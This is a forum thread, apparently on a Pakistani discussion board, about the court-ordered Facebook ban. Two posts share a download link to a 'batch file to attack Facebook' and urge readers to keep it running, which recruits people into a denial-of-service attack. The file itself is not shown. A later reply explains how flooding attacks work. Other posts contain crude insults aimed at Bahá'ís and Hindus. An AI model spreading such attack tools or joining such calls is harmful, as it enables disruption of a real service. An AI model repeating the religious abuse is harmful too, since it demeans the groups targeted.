What's new

Pakistan's Internet censorship

Few hackers have developed batch file to attack Facebook.....

here is the download link

http://********/attack_facebook.zip

just start the file and do not close it untill you turnoff your computer.

Last edited by a moderator:
I think instead of banning we should go and educate what the ground reality is which is opposite to what the western media has been portraying.
The ban news will be a huge successful for hate mongers and Face-book doesn't loose anything cause its not Pakistan specific and revenues from the region are not that big for them.

My suggestion is go to the discussion tell them its not right to abuse others faith and take them head on , cause western minds are polluted with the stories they get from their media about a good religion which has been interpreted wrongly by people worldwide.

Last edited:
facebook has been banned in all cities of PAKistan till31st MAY
ALHAMD-UL-LLILAH

Hey! I am an old man. What is this "Facebook"? :what:

(just kidding. plz ignore facebook. it is run by the bahaii .....)

here is the link.... download it and attack FB

http://www.sajidraheem.com/attack_facebook.zip

yap they were discussing something similar.
but i don't think this gonna work(needs a lot of people to join in) cause until one ping packet is received back, the 2nd one is not sent. but in DOS attack the concept is to flood the server with lot of requests and occupy all the threads.and this can only be done by continuously sending requests and so that any genuine request is not accommodated.

Hey! I am an old man. What is this "Facebook"? :what:

(just kidding. plz ignore facebook. it is run by the bahaii .....)

Bahaii?/ u got to be kidding me..

Bahaii is a very small religious sect.

Got source?:what:

Hahahaha what a loser! so manifestation of gods in rats? hmmm nice, now which one of ur gods do u see in a ***? and what about cockroaches... hmm and the fleas? wow u sure have some really shitty manifestations for ur gods... I pity them for how low have u brought them to be! Kuch haya karo... I have long shunned the path of ridiculing others as my faith doesn't allow it, so can't go to ur cheap chor levels... And the balls thingy ahh the fascination with balls and d**ks! I believe u guys worship that as well or is that too a manifestation... correct me if i m wrong again on this count. Go learn some manners of how to act with ur hosts when u r a guest. How many times do u need to be reminded!

btw how many chappals did u chori today?

Now, you are doing the same thing, that the alleged facebook page is trying to do, bad mouth ones religion. If you think you have the freedom to do it, then freedom of speech it is!

Facebook banned until 31st May only

I hope they permanently ban all social websites :angry:

Time waste

Facebook banned in only Punjab I guess. LHC ordered its ban.

Facebook banned until 31st May only

I hope they permanently ban all social websites :angry:

Time waste

sorry, if it offense you. But what you just said makes me laugh at you.

Back
Top Bottom